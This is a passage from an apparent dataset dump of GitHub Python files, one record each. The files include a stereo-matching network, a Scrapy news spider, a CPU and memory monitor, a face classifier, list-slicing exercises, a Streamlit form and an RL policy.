self.dres1_1(cost0_cube) + cost0_cube # cost0[1, 32, 12, 128, 256]\n\n out1_cube, pre1_cube, post1_cube = self.dres2_1(cost0_cube, None, None)\n out1_cube = out1_cube + cost0_cube\n out2_cube, pre2_cube, post2_cube = self.dres3_1(out1_cube, pre1_cube, post1_cube)\n out2_cube = out2_cube + cost0_cube\n\n out1, pre1, post1 = self.dres2(cost0, None, None) # out1 + cost0:([1, 32, 12, 128, 256])\n out1 = self.fuse0(torch.cat((F.relu(out1 + cost0, inplace=True), out1_cube), dim=1))\n pre1 = F.relu(pre1 + pre1_cube, inplace=True)\n post1 = F.relu(post1 + post1_cube, inplace=True)\n\n out2, pre2, post2 = self.dres3(out1, pre1, post1)\n out2 = self.fuse1(torch.cat((F.relu(out2 + cost0, inplace=True), out2_cube), dim=1))\n\n post2 = F.relu(post2 + post1_cube, inplace=True)\n\n out3, pre3, post3 = self.dres4(out2, pre1, post2)\n out3 = F.relu(out3 + cost0, inplace=True)\n\n cost1 = self.classif1(out1)\n cost2 = self.classif2(out2) + cost1\n cost3 = self.classif3(out3) + cost2\n\n if training:\n cost1 = F.interpolate(cost1, [self.maxdisp * 3, outputs_up.size()[2] * 4, outputs_up.size()[3] * 4],\n mode='trilinear', align_corners=True)\n cost2 = F.interpolate(cost2, [self.maxdisp * 3, outputs_up.size()[2] * 4, outputs_up.size()[3] * 4],\n mode='trilinear', align_corners=True)\n\n cost1 = torch.squeeze(cost1, 1)\n pred1 = F.softmax(cost1, dim=1)\n pred1 = disparityregression_sub3(self.maxdisp)(pred1)\n\n cost2 = torch.squeeze(cost2, 1)\n pred2 = F.softmax(cost2, dim=1)\n pred2 = disparityregression_sub3(self.maxdisp)(pred2)\n\n cost3 = F.interpolate(cost3, [self.maxdisp*3, outputs_up.size()[2]*4, outputs_up.size()[3]*4],\n mode='trilinear', align_corners=True)\n cost3 = torch.squeeze(cost3, 1)\n pred3 = F.softmax(cost3, dim=1)\n pred3 = disparityregression_sub3(self.maxdisp)(pred3)\n\n if training:\n return pred1, pred2, pred3\n else:\n return pred3, None, None\n","repo_name":"01fast/Panoramic-Stereo-Matching-Network-based-on-Bi-Projection-Fusion","sub_path":"networks/cost_basic.py","file_name":"cost_basic.py","file_ext":"py","file_size_in_byte":11551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"3505824180","text":"# -*- coding: utf-8 -*-\n\nimport scrapy\nfrom scrapy import Request\n\nfrom scrapy_news.items import ScrapyNewsItem\n\n\nclass BaseSpider(scrapy.Spider):\n \"\"\"\n 获取中国农业新闻的url列表\n \"\"\"\n\n name = 'agricultural'\n allowed_domains = ['www.farmer.com.cn']\n start_urls = ['http://www.farmer.com.cn/xwpd/btxw/']\n\n def parse(self, response):\n _tmp_url_list = response.xpath(\n '//div[@class=\"yui3-g list-list-li\"]/div[@class=\"yui3-u\"]/a[@class=\"vvqqq\"]/@href').extract()[:100]\n\n agricultural_news_url_list = [\"http://www.farmer.com.cn/xwpd/btxw/%s\" %\n _tmp_url for _tmp_url in _tmp_url_list]\n for political_news_url in agricultural_news_url_list:\n\n # callback用法,detail是另一个方法\n yield Request(url=political_news_url, callback=self.agricultural_detail)\n\n def agricultural_detail(self, response):\n item = ScrapyNewsItem()\n base_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div/text()').extract()\n tag_p_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/p/text()').extract()\n tag_image_contents_list = response.xpath('//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div[@class=\"Custom_UnionStyle\"]/p/text()').extract()\n base_contents = \"\\n\".join(base_contents_list).strip()\n tag_p_contents = \"\\n\".join(tag_p_contents_list).strip()\n tag_image_contents = \"\\n\".join(tag_image_contents_list).strip()\n contents = base_contents + tag_p_contents + tag_image_contents\n if not contents:\n return\n try:\n item[\"image\"] = response.xpath(\n '//div[@class=\"content\"]/div[@class=\"TRS_Editor\"]/div[@class=\"Custom_UnionStyle\"]/p/img/@src'\n ).extract()[0]\n except:\n pass\n\n item[\"title\"] = response.xpath(\n '//div[@class=\"zhengwen-left-container\"]/h1[@class=\"wtitle\"]/text()').extract()[0]\n item[\"contents\"] = contents\n item[\"auth\"] = response.xpath(u'//div[@class=\"content\"]/div[contains(text(),\"责任编辑\")]/text()').extract()[0]\n item[\"occurd_time\"] = response.xpath('//div[@class=\"yui3-g\"]/div[@class=\"yui3-u\"]/p[@class=\"wlaiyuan\"]/text()').extract()[0]\n item[\"source_url\"] = response.url\n item[\"source\"] = u\"中国农业新闻网\"\n\n yield item\n","repo_name":"codebeen/chuangemen","sub_path":"bin/scrapy_news/scrapy_news/spiders/agricultural_news.py","file_name":"agricultural_news.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34370927218","text":"import sys\nfrom os.path import dirname, exists, join\n\nDATA_DIR = join(dirname(__file__), 'data')\n\nDBS = ['home_sensors_v1']\n\ndef on_server_loaded(server_context):\n if not all(exists(join(DATA_DIR, '%s.csv' % x)) for x in DBS):\n print()\n print(\"Due to performance considerations, you must first run background_downloader.py to download the data set yourself.\")\n print()\n\n sys.exit(1)","repo_name":"dudasdavid/HomeSensorsWebApp","sub_path":"app_hooks.py","file_name":"app_hooks.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8501673253","text":"import cv2 as cv\r\nimport os\r\nimport glob\r\nimport tensorflow as tf\r\nimport numpy as np\r\nfrom tensorflow.keras import layers, models\r\n\r\ndef resize(img):\r\n width = 200\r\n height = 200 # keep original height\r\n dim = (width, height)\r\n # resize image\r\n resized = cv.resize(img, dim, interpolation=cv.INTER_AREA)\r\n return resized\r\n\r\ndef get_images(location, format):\r\n image_array = []\r\n files = glob.glob(\"\" + location + \"*.\" + format + \"\")\r\n cv2_base_dir = os.path.dirname(os.path.abspath(cv.__file__))\r\n face_model = os.path.join(cv2_base_dir, 'data/haarcascade_frontalface_default.xml')\r\n eye_model = os.path.join(cv2_base_dir, 'data/haarcascade_eye.xml')\r\n face_cascade = cv.CascadeClassifier(face_model)\r\n eye_cascade = cv.CascadeClassifier(eye_model)\r\n for myFile in files:\r\n image = cv.imread(myFile)\r\n faces = face_cascade.detectMultiScale(image, 1.3, 5)\r\n print(len(faces))\r\n if len(faces) >= 1:\r\n for face in faces:\r\n (x, y, w, h) = face\r\n face_img = cv.rectangle(image, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n cropped_face = face_img[y:y + h, x:x + w]\r\n eyes = eye_cascade.detectMultiScale(cropped_face)\r\n if len(eyes) >= 2:\r\n image_conv = resize(cropped_face)\r\n image_array.append(image_conv)# append each image to array\r\n else:\r\n print(\"Bad Image\")\r\n else:\r\n print(\"Bad Image\")\r\n return image_array\r\n\r\n\r\ndef create_model(className):\r\n model = models.Sequential()\r\n model.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(200, 200, 3)))\r\n model.add(layers.MaxPooling2D((2, 2)))\r\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n model.add(layers.MaxPooling2D((2, 2)))\r\n model.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n model.summary() # let's have a look at our model so far\r\n\r\n model.add(layers.Flatten())\r\n model.add(layers.Dense(64, activation='relu'))\r\n model.add(layers.Dense(len(className)))\r\n model.summary()\r\n model.compile(optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\r\n metrics=['accuracy'])\r\n return model\r\nclassName = [\"CHristiano Ronaldo\",\"Lionel Messi\",\"Paulo Dybala\",\"Sergio Aguero\",\"Sergio Romero\"]\r\nmodel = create_model(className)\r\ncheckpoint_path = \"training_1/cp.ckpt\"\r\n\r\n#load weights into the untrained model with the weights stored in checkpoint path\r\nmodel.load_weights(checkpoint_path)\r\n\r\nim_arr = get_images(\"pred/\",\"jpg\")\r\npredict_images_mat = np.array(im_arr)\r\n#test accuraacy of the test dataset\r\npredictions = model.predict(predict_images_mat)\r\nprint(predictions)","repo_name":"hamzakarim94/Sports-Classifier","sub_path":"Load_trained_model.py","file_name":"Load_trained_model.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1321829228","text":"#!/usr/bin/env python3\n\n\nimport multiprocessing\nimport os\nimport os.path\n\nfrom jnscommons import jnsos\n\nPROC_MEM_FILE = '/proc/meminfo'\nPROC_CPU_FILE = '/proc/stat'\n\nSYSMONITOR_CONFIG_DIR = os.path.join(os.path.expanduser('~'), '.jns/sysmonitor')\nOLD_CPU_STAT_FILE = 'old-cpu-stat.txt'\nOLD_CPU_USAGE_FILE = 'old-cpu-usage.txt'\n\n# The time lengths in /proc/stat are mesured in 1/100ths of a second by default on x86 systems. These variables are the\n# minimum/maximum amount of time between reading the CPU stats that this script will allow. If the time between\n# readings is less than the minimum, the old CPU usage will be used. If the time between readings is greater than this,\n# the CPU usage will be `None'.\n#\n# The time lengths have to be multiplied by the number of CPU cores in the current computer. This is becuase the master\n# CPU stat line is just a sumation of all the individual CPU cores' stat lines. So, with an 8 core machine, if a single\n# second has passed between readings of the stats, each CPU stat line will have incremented by a second. That means the\n# total stat line will have incremented by 8 seconds.\n_CPU_COUNT = multiprocessing.cpu_count()\nCPU_STAT_MIN_TIME = 1000 * _CPU_COUNT\nCPU_STAT_MAX_TIME = 5000 * _CPU_COUNT\n\n\ndef main():\n _validate_os()\n mem_usage = get_memory_usage()\n cpu_usage = get_cpu_usage()\n\n print(\"Mem: {}, CPU: {}\".format(\n '--' if mem_usage is None else str(mem_usage) + '%',\n '--' if cpu_usage is None else str(cpu_usage) + '%'))\n\n\n########################\n# Validation Functions #\n########################\n\n\ndef _validate_os():\n if not (jnsos.is_linux() or jnsos.is_cygwin()):\n raise OSError('Unsupported operating system: {}. Only Linux and Cygwin are supported.')\n\n\n##########################\n# Memory Usage Functions #\n##########################\n\n\ndef get_memory_usage():\n mem_total, mem_available = _read_meminfo()\n usage = None\n\n if mem_total and mem_available:\n usage = (mem_total - mem_available) / mem_total * 100\n\n return round(usage) if usage is not None else None\n\n\ndef _read_meminfo():\n mem_total = None\n mem_available = None # This is not available in Cygwin, so we have to use MemFree instead\n mem_free = None\n\n with open(PROC_MEM_FILE, 'r') as f:\n line = f.readline()\n\n while (mem_total is None or mem_available is None or mem_free is None) and line:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemAvailable:'):\n mem_available = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n\n line = f.readline()\n\n if not mem_available:\n mem_available = mem_free\n\n return mem_total, mem_available\n\n\n#######################\n# CPU Usage Functions #\n#######################\n\n\ndef get_cpu_usage():\n raw_stat_old = _read_cpu_stat(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_STAT_FILE))\n raw_stat_new = _read_cpu_stat(PROC_CPU_FILE)\n cpu_info_old = _get_cpu_info(raw_stat_old)\n cpu_info_new = _get_cpu_info(raw_stat_new)\n usage = None\n\n # If there is no old CPU stat reading, create one\n if raw_stat_old is None:\n _write_last_cpu_stat(raw_stat_new)\n\n # If there is not enough information to calculate the CPU usage. This can happen if the old CPU info file is empty.\n # The old file can end up empty sometimes if the terminal is closed while this program is running.\n elif not _can_calculate_cpu_usage(cpu_info_old, cpu_info_new):\n _write_last_cpu_stat(raw_stat_new)\n\n # If we have all the information needed to calculate the CPU usage\n else:\n delta_total = abs(cpu_info_new.total - cpu_info_old.total)\n\n # Too little time has passed between readings\n if delta_total < CPU_STAT_MIN_TIME:\n usage = _read_last_cpu_usage()\n # Too much time has passed between readings\n elif delta_total > CPU_STAT_MAX_TIME:\n _write_last_cpu_stat(raw_stat_new)\n # An acceptable amount of time has passed between readings\n else:\n delta_idle = cpu_info_new.idle - cpu_info_old.idle\n usage = (delta_total - delta_idle) / delta_total * 100\n\n _write_last_cpu_usage(usage)\n _write_last_cpu_stat(raw_stat_new)\n\n return round(usage) if usage is not None else None\n\n\ndef _can_calculate_cpu_usage(cpu_info_old, cpu_info_new):\n return (cpu_info_old and\n cpu_info_old.idle and\n cpu_info_old.total and\n cpu_info_new and\n cpu_info_new.idle and\n cpu_info_new.total)\n\n\ndef _read_cpu_stat(stat_file):\n stat = None\n\n if os.path.exists(stat_file):\n with open(stat_file, 'r') as f:\n stat = f.read()\n\n return stat\n\n\ndef _write_last_cpu_stat(cpu_stat):\n _make_config_dir()\n with open(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_STAT_FILE), 'w') as f:\n f.write(cpu_stat)\n\n\ndef _get_cpu_info(cpu_stat):\n cpu_info = None\n\n if cpu_stat:\n lines_it = iter(cpu_stat.splitlines())\n line = next(lines_it, None)\n\n while cpu_info is None and line:\n if line.startswith('cpu '):\n cpu_info = _read_cpu_stat_line(line)\n\n line = next(lines_it, None)\n\n return cpu_info\n\n\ndef _read_cpu_stat_line(line):\n parts = line.split()\n\n user, system, nice, idle = parts[1:5]\n\n if jnsos.is_linux():\n wait, irq, srq, zero = parts[5:9]\n else:\n wait, irq, srq, zero = [0, 0, 0, 0]\n\n return CPUInfo(\n user=int(user),\n system=int(system),\n nice=int(nice),\n idle=int(idle),\n wait=int(wait),\n irq=int(irq),\n srq=int(srq),\n zero=int(zero))\n\n\ndef _read_last_cpu_usage():\n usage = None\n usage_file = os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_USAGE_FILE)\n\n if os.path.exists(usage_file):\n with open(usage_file, 'r') as f:\n try:\n usage = float(f.readline())\n except ValueError:\n usage = None\n\n return usage\n\n\ndef _write_last_cpu_usage(usage):\n _make_config_dir()\n\n with open(os.path.join(SYSMONITOR_CONFIG_DIR, OLD_CPU_USAGE_FILE), 'w') as f:\n f.write(str(usage))\n\n#####################\n# Utility Functions #\n#####################\n\n\ndef _make_config_dir():\n if not os.path.isdir(SYSMONITOR_CONFIG_DIR):\n os.makedirs(SYSMONITOR_CONFIG_DIR)\n\n\n###########\n# Classes #\n###########\n\n\nclass CPUInfo:\n def __init__(self, user, system, nice, idle, wait, irq, srq, zero):\n self.user = user\n self.system = system\n self.nice = nice\n self.idle = idle\n self.wait = wait\n self.irq = irq\n self.srq = srq\n self.zero = zero\n self.total = user + system + nice + idle + wait + irq + srq + zero\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eviljoe/junk-n-stuff","sub_path":"src/sysmonitor.py","file_name":"sysmonitor.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5166794265","text":"# -*- coding: utf-8 -*-\n\n\nimport os\nimport operator\nimport rtlib.tfile\nimport ulib.tools.fmt\nimport ulib.validators.fs\n\nfrom slib import widgetlib\nfrom slib import html\n\n\n##### Public methods #####\n@widgetlib.provides(\"torrents_table\", \"torrents_count\", \"torrents_size\")\n@widgetlib.required(css_list=(\"simple_table.css\",))\ndef torrentsList(torrents_dir_path, link_prefix) :\n\ttorrents_dir_path = ulib.validators.fs.validAccessiblePath(torrents_dir_path)\n\tlink_prefix = os.path.normpath(link_prefix)\n\n\tsize = 0\n\trows_list = []\n\tfor (torrent_file_name, torrent) in sorted(rtlib.tfile.torrents(torrents_dir_path).items(), key=operator.itemgetter(0)) :\n\t\ttorrent_size = torrent.size()\n\t\tsize += torrent_size\n\t\trows_list.append([\n\t\t\t\tstr(len(rows_list) + 1),\n\t\t\t\t\"%s\" % (os.path.join(link_prefix, torrent_file_name), torrent_file_name),\n\t\t\t\tulib.tools.fmt.formatSize(torrent_size),\n\t\t\t\thtml.maybeLink(torrent.comment() or \"\"),\n\t\t\t])\n\ttorrents_table = html.tableWithHeader([\"N\", \"Name\", \"Size\", \"Comment\"], rows_list)\n\n\treturn (torrents_table, str(len(rows_list)), ulib.tools.fmt.formatSize(size))\n\n","repo_name":"mdevaev/slib","sub_path":"slib/widgets/torrents.py","file_name":"torrents.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27949165377","text":"\"\"\"Напишите программу, которая принимает из аргументов командной строки список спортсменов, а затем выводит первую тройку.\n\nПример использования:\n> python program.py Ильин Петров Зинько Сидоров Васильев Литвинов\n> ['Ильин', 'Петров', 'Зинько']\n \"\"\"\n\nimport sys\nsportmen = sys.argv\nprint(sportmen[1:4])\n\n\n'''Последняя тройка\n\nНапишите программу, которая принимает из аргументов командной строки список спортсменов, а затем выводит последнюю тройку.\n\nПример использования:\n> python program.py Ильин Петров Зинько Сидоров Васильев Литвинов\n> ['Сидоров', 'Васильев', 'Литвинов']\n '''\n\nimport sys\nathletes = sys.argv[1:]\nprint(athletes[-3:])\n\n\n\n'''Новая тройка победителей\n\nНапишите программу, которая принимает из аргументов командной строки список из трех спортсменов, а затем заменяет первую тройку в списке athletes новыми значениями.\n\nПример использования:\n> python program.py Зидан Анри Пети\n> ['Зидан', 'Анри', 'Пети', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\n '''\n\nimport sys\nnew_athletes = sys.argv[1:4]\n\nathletes = ['Иванов', 'Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\nathletes[:3] = new_athletes\nprint(athletes)\n\n'''Исправляем ошибку\n\nПрограмма ниже должна принимать из аргументов командной строки новую модель автомобиля и добавлять её в конец списка cars. Но при написании что-то пошло не так и автомобиль не добавляется. Исправьте ошибку.\nПример использования:\n> python program.py Lada\n> ['BMW', 'Audi', 'Toyota', 'Mazda', 'Lada']'''\n\n\nimport sys\n\nnew_car = str(sys.argv[1])\nnew_car = [new_car]\ncars = ['BMW', 'Audi', 'Toyota', 'Mazda']\ncars += new_car\nprint(cars)\n\n\n\"\"\"Дисквалификация\n\nВ переменной athletes хранится список спортсменов. Организаторы соревнований решили дисквалифицировать одного из участников. Напишите программу, которая принимает из аргументов командной строки индекс спортсмена, удаляет его из списка, а затем выводит оставшийся список.\n\nПример использования:\n> python program.py 0\n> ['Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\"\"\"\n\nimport sys\nindex = int(sys.argv[1])\nathletes = ['Иванов', 'Ильин', 'Петров', 'Зинько', 'Сидоров', 'Васильев', 'Литвинов']\ndel athletes[index]\nprint(athletes)\n\n\"\"\"Население\n\nВ редакторе ниже находится список population, который хранит население России с 2003 по 2020 год включительно. Данные упорядочены по годам.\n\nНапишите программу, которая принимает из аргументов командной строки два значения: начальный и конечный год, а затем выводит список с количеством человек в данный период (включая последний переданный год).\n\nТо есть, если программа получает 2004 и 2006 год, то она должна вывести данные за 2004, 2005 и 2006 годы.\nПример использования:\n> python program.py 2004 2006\n> [144168205, 143474219, 142753551]\"\"\"\n\nimport sys\nyear_start, year_end = int(sys.argv[1]), int(sys.argv[2])\n\npopulation = [\n 144_963_650, # 2003\n 144_168_205,\n 143_474_219,\n 142_753_551,\n 142_220_968,\n 142_008_838,\n 141_903_979,\n 142_856_536,\n 142_865_433,\n 143_056_383,\n 143_347_059,\n 143_666_931,\n 146_267_288,\n 146_544_710,\n 146_804_372,\n 146_880_432,\n 146_780_720,\n 146_748_590 # 2020\n]\n\nprint(population[year_start-2003:year_end-2003+1])\n\n\n\n\n\n\n","repo_name":"maxelame/PYTHON","sub_path":"Shultais_Education/4_Features_of_slices_in_lists.py","file_name":"4_Features_of_slices_in_lists.py","file_ext":"py","file_size_in_byte":4756,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15637621867","text":"from sqlalchemy import Column, Integer, String\n\nfrom DataLayer.DAL import Base, DAL\nfrom domain.main.Utils.ConcurrentDictionary import ConcurrentDictionary\nfrom src.domain.main.Utils.Logger import report\nfrom src.domain.main.Utils.Response import Response\n\n\n\n\nclass OwnersApproval(Base):\n __tablename__ = 'owner_approvals'\n __table_args__ = {'extend_existing': True}\n approval_id = Column(\"approval_id\", Integer, primary_key=True)\n store_name = Column(\"store_name\", String, default='')\n person_to_approve = Column(\"person_to_approve\", String, default='')\n starter = Column(\"starter\", String, default='')\n to_approve_str = Column(\"purchase_history_str\", String, default='')\n\n def __init__(self, approval_id, l: list, sender:str, store_name=\"\", person_to_approve=\"\"):\n self.approval_id = approval_id\n self.store_name = store_name\n self.person_to_approve = person_to_approve\n self.to_approve = {}\n self.starter = sender\n self.to_approve_str = ''\n for person in l:\n if person == sender:\n self.to_approve[sender] = True\n self.to_approve_str += f'{person}:1,'\n else:\n self.to_approve[person] = False\n self.to_approve_str += f'{person}:0,'\n\n def remove_owner(self, person: str):\n self.to_approve.pop(person)\n names_list = self.to_approve_str.split(',')\n updated_list = [item for item in names_list if not item.startswith(person)]\n self.to_approve_str = ','.join(updated_list)\n DAL.update(self)\n\n def add_owner(self, person: str):\n self.to_approve[person] = False\n self.to_approve_str += f'{person}:0'\n\n def approve(self, person: str) -> Response:\n self.to_approve[person] = True\n names_list = self.to_approve_str.split(',')\n updated_list = []\n for item in names_list:\n if len(item) > 2:\n name, value = item.split(':')\n if name == person:\n item = f\"{name}:1\"\n updated_list.append(item)\n self.to_approve_str = ','.join(updated_list)\n\n res = self.is_approved()\n if not res.result:\n return res\n return report(f\"{person} approved bid\", True)\n\n def is_approved(self) -> Response[bool]:\n for p in self.to_approve:\n if not self.to_approve[p]:\n return report(f\"is_approved {p} not approved yet\", False)\n\n return report(\"approved\", True)\n\n def restore(self):\n for p in self.to_approve:\n self.to_approve[p] = False\n self.to_approve_str.replace(\":1\", \":0\")\n DAL.update(self)\n\n def left_to_approve(self) -> list[str]:\n l = []\n for p in self.to_approve:\n if not self.to_approve[p]:\n l.append(p)\n return l\n\n @staticmethod\n def create_instance_from_db_query(r):\n approval_id, store_name, person_to_approve, starter, to_approve_str = \\\n r.approval_id, r.store_name, r.person_to_approve, r.starter, r.to_approve_str\n\n names_list = to_approve_str.split(',')\n parsed_dict = {}\n for item in names_list:\n if len(item) > 2:\n name, value = item.split(':')\n parsed_dict[name] = bool(int(value))\n\n approval = OwnersApproval(approval_id, [], starter, store_name, person_to_approve)\n approval.to_approve = parsed_dict\n approval.to_approve_str = to_approve_str\n return approval\n\n @staticmethod\n def load_all_approvals_for_owners(store_name):\n out = ConcurrentDictionary()\n for a in DAL.load_all_by(OwnersApproval, lambda r: r.store_name == store_name, OwnersApproval.create_instance_from_db_query):\n out.insert(a.person_to_approve, a)\n return out\n\n\n @staticmethod\n def add_record(approval):\n DAL.add(approval)\n\n @staticmethod\n def delete_record(approval_id):\n DAL.delete(OwnersApproval, lambda r: r.approval_id == approval_id)\n\n @staticmethod\n def clear_db():\n DAL.clear(OwnersApproval)","repo_name":"BatelBB/Workshop-on-Software-Engineering-Project","sub_path":"src/domain/main/Utils/OwnersApproval.py","file_name":"OwnersApproval.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42939741830","text":"from pymongo import MongoClient\n\n\nclass nlpDB:\n def __init__(self):\n try:\n self.clientclient = pymongo.MongoClient(\"mongodb+srv://saif_test1:@cluster1.yqruc.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\")\n #self.client = MongoClient(\"mongodb+srv://saif_test1:@cluster1.yqruc.mongodb.net/test\")\n self.db = self.client.get_database('myFirstDatabase')\n self.records = self.db['nlp_records']\n except Exception as e:\n print(e)\n\n\n # To add new row\n def updateDataBase(self, essay, essay_set, result):\n row = {}\n row['essay_token_pad'] = essay\n row['essay_set'] = essay_set\n # row['sent_count'] = sent_count\n # row['word_count'] = word_count\n row['result'] = result\n self.records.insert_one(row)","repo_name":"mdsaifk/Auto-essay-grading","sub_path":"src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"15385864766","text":"import streamlit as st\nimport requests\nimport pandas as pd\nimport pickle\n\n\ndef app():\n st.title('Below please enter the details')\n df=pd.read_csv('data_schema.csv')\n st.subheader('Go to info page where you can find the details which are requried to file')\n requried_columns=list(df.loc[df['requried']==True,'name'].values)\n data={}\n with open('encoders.pkl','rb') as f:\n encoders=pickle.load(f)\n for col,encoder in encoders.items():\n enter=st.selectbox(f\"select value for {col}\",list(encoder.classes_))\n if enter:\n if col=='primary_use':\n data[col]=enter\n else:\n data[col]=int(enter)\n else:\n if col=='primary_use':\n data[col]=str(list(encoder.classes_)[0])\n else:\n data[col]=int(list(encoder.classes_)[0])\n categorical_columns=list(encoders.keys())\n numerical_columns=list(col for col in df['name'].values if col not in categorical_columns)\n for col in numerical_columns:\n enter=st.text_input(f'fill the value of {col}')\n if enter:\n try:\n requried_dtype=df.loc[df['name']==col,'dtype'].values[0]\n if requried_dtype=='float':\n data[col]=float(enter)\n elif requried_dtype=='int':\n data[col]=int(enter)\n except:\n st.error(f\"enter correct dtype\")\n if st.button('submit'):\n count=0\n for col in requried_columns:\n if data[col]==None:\n st.error(f\"{col} is not filled\")\n count+=1\n if count == 0:\n with st.spinner(text='In progress'):\n response=requests.post('http://fastapi:8000/predict',json=data).json()\n reading=response['meter_reading']\n if reading<0:\n reading=0\n st.success(f\"meter reading is {reading} kWh\")","repo_name":"RavitejaBadugu/ashare","sub_path":"deployment/streamlit/uploads.py","file_name":"uploads.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37143986349","text":"import Exobjects\nimport GMeshTools\n\n# create empty background grid\nlimits = [[-2.0,2.0], [-0.75,0.75], [-0.1,0.1]]\nsize = 0.1\ngmesh = GMeshTools.GMesh(limits, size)\n\n# construct geometry on background grid\n\nbody = GMeshTools.Body()\n\nsurf1 = GMeshTools.Boundary()\nsurf2 = GMeshTools.Boundary()\n\n# brick\nx = 2.8\ny = 1.2\nz = 0.1\nbrick = GMeshTools.Brick(x, y, z)\nbody.Add(brick)\n\n# add cylinder ends\nheight = 0.1\nradius = 0.6\nposition = [1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Add(cylinder)\n\nposition = [-1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Add(cylinder)\n\n# subtract bolt holes\nradius = 0.3575\nposition = [1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Subtract(cylinder)\n\nsurf1.Add(cylinder.wall)\n\nposition = [-1.4, 0.0, 0.0]\ncylinder = GMeshTools.Cylinder(height, radius, position)\nbody.Subtract(cylinder)\n\nsurf2.Add(cylinder.wall)\n\ngmesh.ImprintBody(body)\ngmesh.CreateBoundary(surf1,100)\ngmesh.CreateBoundary(surf2,200)\n\n\ngmesh.write(\"coupon.gen\")\n","repo_name":"dolanjp/Albany_3DM_Master","sub_path":"tests/small/ATO/Cogent_Tab/coupon.py","file_name":"coupon.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"13117565235","text":"# ace/ace_system.py\nfrom .bus import Bus\nfrom .l1_aspirational import L1AspirationalLayer\nfrom .l3_agent import L3AgentLayer\n\n\nclass AceSystem:\n def __init__(self, llm, model):\n self.northbound_bus = Bus('northbound')\n self.southbound_bus = Bus('southbound')\n\n self.l1_aspirational_layer = L1AspirationalLayer(\n llm,\n model,\n self.southbound_bus,\n self.northbound_bus\n )\n\n self.l3_agent = L3AgentLayer(\n llm,\n model,\n self.southbound_bus,\n self.northbound_bus\n )\n\n self.layers = [\n self.l1_aspirational_layer,\n self.l3_agent\n ]\n\n def get_layers(self):\n return self.layers\n\n def start(self):\n self.northbound_bus.subscribe(self.l1_aspirational_layer.on_northbound_message)\n","repo_name":"OriginalGrubbsy/ACE_Framework","sub_path":"demos/stacey/backend/ace/ace_system.py","file_name":"ace_system.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"69829802667","text":"import torch\nimport torch.nn.functional as F\nfrom torch.distributions import Normal\nimport numpy as np\nfrom utils import discount_rewards\n\n\nclass Policy(torch.nn.Module):\n def __init__(self, state_space, action_space):\n super().__init__()\n self.state_space = state_space\n self.action_space = action_space\n self.hidden = 64\n self.fc1 = torch.nn.Linear(state_space, self.hidden)\n self.fc2_mean = torch.nn.Linear(self.hidden, action_space)\n\n # Task 1a, 1b, 1c\n # self.sigma = torch.Tensor([5.0])\n\n # Task 2a\n # self.initial_sigma = torch.Tensor([10.0])\n # self.sigma = torch.Tensor([10.0])\n\n # Task 2b\n self.sigma = torch.nn.Parameter(torch.Tensor([10.0]))\n self.init_weights()\n\n def init_weights(self):\n for m in self.modules():\n if type(m) is torch.nn.Linear:\n torch.nn.init.normal_(m.weight)\n torch.nn.init.zeros_(m.bias)\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n action_mean = self.fc2_mean(x)\n sigma = torch.sqrt(self.sigma) # DONE: Is it a good idea to leave it like this?\n\n # DONE: Instantiate and return a normal distribution\n # with mean mu and std of sigma (T1)\n action_dist = Normal(loc=action_mean, scale=sigma)\n\n return action_dist\n\n def update_sigma_exponentially(self, episode_number):\n c = 0.0005\n self.sigma = self.initial_sigma * np.exp(-c * episode_number)\n\n\nclass Agent(object):\n def __init__(self, 